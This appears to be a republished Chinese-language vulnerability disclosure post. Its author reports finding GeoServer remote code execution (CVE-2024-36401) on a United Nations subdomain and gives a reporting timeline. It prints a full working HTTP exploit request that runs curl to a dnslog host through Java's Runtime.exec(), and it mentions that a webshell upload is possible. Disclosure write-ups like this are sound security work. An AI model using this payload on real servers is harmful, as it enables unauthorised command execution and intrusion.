前言

联合国 un.org 网站上存在 GeoServer 远程命令执行漏洞 (CVE-2024-36401)，攻击者可利用此漏洞获取服务器权限。

细节

当我使用shodan的时候，我发现了一个域名：geogss.dfs.un.org，这是一个Geo Server网站。

然后我发送有效载荷

GET  /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'curl%20http://uoyyjp.dnslog.cn')  HTTP/1.1
主机： geogss.dfs.un.org
用户代理： Mozilla/5.0  (Macintosh;  Intel  Mac  OS  X  10.15 ;  rv:127.0)  Gecko/20100101  Firefox/127.0
接受： text/html、application/xhtml+xml、application/xml；q=0.9、image/avif、image/webp、*/*；q=0.8
接受语言： zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Accept-Encoding:  gzip,  deflate 
Sec-GPC:  1
连接:  close 
Upgrade-Insecure-Requests:  1 
Sec-Fetch-Dest:  document 
Sec-Fetch-Mode:  navigation 
Sec-Fetch-Site:  none 
Sec-Fetch-User:  ?1 
X-Forwarded-For:  0000 :0000::0000 
X-Originating-IP:  0000 :0000:0000::0000 
X-Remote-IP:  0000 :0000:0000::0000 
X-Remote-Addr:  0000 :0000:0000::0000
优先级:  u=1

然后我在 dnslog 上收到了请求

当然，此漏洞也可以上传到webshell。

考虑到安全问题，没有执行getshell操作！

时间线

2024–7–3 我发现了一个漏洞并向安全团队报告。

2024-7-3 安全团队回复正在审核中。

2024–7–28 提交报告后不久发现漏洞就被修复了，但是安全团队还没回复我，于是发邮件询问进展，但还没收到回复。

2024-8-8 我发了一封邮件询问进展，但还没有收到回复。

2024–9–25 我发了一封邮件询问进展，但还没有收到回复。

2024-10-10 我发现漏洞报告已经超过90天期限，安全团队仍未回复我，而名人堂一直在正常更新名单。所以我决定公开这个漏洞。

原文始发于微信公众号（安全狗的自我修养）：我是如何在联合国找到 RCE 的